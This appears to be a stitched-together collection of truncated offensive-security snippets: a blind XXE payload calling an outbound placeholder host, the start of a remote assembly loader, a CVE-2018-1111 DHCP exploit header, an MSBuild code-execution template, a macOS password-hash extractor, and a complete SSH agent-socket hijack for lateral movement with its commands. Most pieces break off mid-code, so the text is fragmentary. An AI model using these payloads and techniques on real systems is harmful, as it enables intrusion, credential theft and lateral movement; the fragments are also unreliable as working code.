| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
| $Source = @" | |
| using System; | |
| using System.Net; | |
| using System.Reflection; | |
| namespace LoadAssembly { | |
| public static class LoadAssembly { | |
| public static void load() { | |
| WebClient webclient = new WebClient(); | |
| IWebProxy defaultProxy = WebRequest.DefaultWebProxy; | |
| if (defaultProxy != null) { |
| #!/bin/bash | |
| # CVE-2018-1111 | |
| # This script will setup your host as a DHCP provider and attempt to exploit any | |
| # vulnerable connecting RHEL hosts. | |
| # REQUIREMENTS: | |
| # dnsmasq | |
| #!/bin/bash | |
| # Written by Frans Rosén (twitter.com/fransrosen) | |
| _debug="$2" #turn on debug | |
| _timeout="20" | |
| #you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key | |
| _aws_key="AKIA..." | |
| H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3" | |
| H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36" |
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <Target Name="DemoClass"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask | |
| TaskName="ClassExample" | |
| TaskFactory="CodeTaskFactory" | |
| AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
| <Task> | |
| <Code Type="Class" Language="cs"> |
| import requests, json | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning, InsecurePlatformWarning, SNIMissingWarning | |
| from bs4 import BeautifulSoup | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| requests.packages.urllib3.disable_warnings(InsecurePlatformWarning) | |
| requests.packages.urllib3.disable_warnings(SNIMissingWarning) | |
| # another source of cidrs by asn | |
| def getIPCidrs(asn): |
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |
| #!/usr/bin/python | |
| """ | |
| POC of a redirect leak via CSP reports | |
| as described in https://obmiblog.blogspot.com/2019/12/gcp-5k-file-uploading-csrf.html | |
| Usage: navigate to http://localhost:8080/?http://url.to.check/ | |
| Works on Chrome v77 and Safari v13.0.5 | |
| On Firefox does the right thing and returns the original frame URL | |
| """ | |
| import json |
| #!/bin/bash | |
| extractOsXUserHash() { | |
| xmlOfUsertPlist="$( \ | |
| plutil -convert xml1 - -o - \ | |
| )" | |
| if [ -z "$xmlOfUsertPlist" ] ; then \ | |
| 1>&2 echo "No input detected" | |
| exit 127 | |
| fi |
Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld
user@internal:~$ hostname -f
internal.company.tld